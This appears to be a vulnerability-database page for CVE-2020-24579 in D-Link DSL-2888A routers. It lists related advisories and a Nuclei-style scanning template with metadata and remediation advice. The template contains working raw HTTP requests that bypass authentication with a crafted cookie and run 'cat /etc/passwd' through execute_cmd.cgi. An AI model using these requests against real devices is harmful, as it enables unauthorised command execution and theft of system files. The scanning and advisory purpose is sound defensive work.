| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| The vulnerability of the web portal of D-Link DSL-2888A microprogramming software for routers allows a hacker to exploit it to increase their privileges. | 15 Mar 202100:00 | – | bdu_fstec | |
| CVE-2020-24579 | 22 Dec 202022:53 | – | circl | |
| D-link DSL-2888A 授权问题漏洞 | 22 Dec 202000:00 | – | cnnvd | |
| D-Link DSL-2888A Access Control Error Vulnerability | 23 Dec 202000:00 | – | cnvd | |
| CVE-2020-24579 | 22 Dec 202018:04 | – | cve | |
| CVE-2020-24579 | 22 Dec 202018:04 | – | cvelist | |
| CVE-2020-24579 | 22 Dec 202019:15 | – | nvd | |
| D-Link DSL-2888A < AU_2.31_V1.1.47ae55 Multiple Vulnerabilities | 22 Dec 202000:00 | – | openvas | |
| CVE-2020-24579 | 22 Dec 202019:15 | – | osv | |
| Authentication flaw | 22 Dec 202019:15 | – | prion |
id: CVE-2020-24579
info:
name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
author: pikpikcu
severity: high
description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
impact: |
Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router.
remediation: |
Apply the latest firmware update provided by D-Link to fix the vulnerability.
reference:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24579
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-24579
cwe-id: CWE-287
epss-score: 0.09997
epss-percentile: 0.9504
cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: dlink
product: dsl2888a_firmware
tags: cve,cve2020,dlink,rce,vuln
http:
- raw:
- | # Response:Location: /page/login/login_fail.html
POST / HTTP/1.1
Host: {{Hostname}}
Cookie: uid=6gPjT2ipmNz
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
Cookie: uid=6gPjT2ipmNz
matchers-condition: and
matchers:
- type: regex
regex:
- "nobody:[x*]:65534:65534"
- "root:.*:0:0:"
condition: or
- type: status
status:
- 200
# digest: 4b0a004830460221009db28a6ae5f84a8074a5c82129a8c4e5daa67929ebf0ea3a0a4b7bc44ea5c1f9022100a64eee55ad1787a329e6a35a00dd119d9987e9c6ac291f0f6320b30910bca4d6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation